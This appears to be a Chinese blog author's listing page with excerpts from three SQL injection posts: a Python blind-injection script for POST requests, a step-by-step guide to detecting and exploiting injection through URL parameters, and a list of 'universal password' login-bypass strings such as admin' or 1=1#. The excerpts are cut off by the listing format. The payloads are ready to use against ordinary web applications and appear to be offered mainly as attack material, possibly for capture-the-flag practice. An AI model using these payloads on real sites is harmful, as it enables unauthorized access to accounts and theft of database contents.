sql
white_&_black
这个作者很懒,什么都没留下…
展开
-
sql盲注脚本
盲注脚本POST型from time import sleepimport requestss = requests.Session()url = '******'flag = ''class Solution: # 数据库名 def function_database(self,left_num, compare_str_num): payload = f"/**/or/**/ord(right(left((database()),{left_num}原创 2021-08-14 17:32:59 · 194 阅读 · 0 评论 -
sql注入基本流程
判断注入类型数字型注入?id=2' 返回错误,未对单引号作处理?id=2 and 1=1 运行正常?id=2 and 1=2 运行异常字符型注入?username=admin' 返回错误,未对单引号作处理?username=admin' and '1'='1 运行正常?username=admin' and '1'='2 运行异常注意:下面为示例都是字符型注入判断字段长度?id=1' o原创 2021-08-06 11:12:07 · 170 阅读 · 0 评论 -
万能密码
sql万能密码admin' or 1=1#'or 1=1"or "a"="a"or 1=1--"or"=""or"="a'='a"or1=1--"or=or"''or'='or'') or ('a'='a'.).or.('.a.'='.a'or 1=1'or 1=1--'or 1=1/*'or"="a'='a'or' '1'='1''or''=''or''=''or''=''or'='1''or'='or''or.'a.'='a'or1=1--1'or'1'='转载 2021-02-01 12:34:42 · 1382 阅读 · 0 评论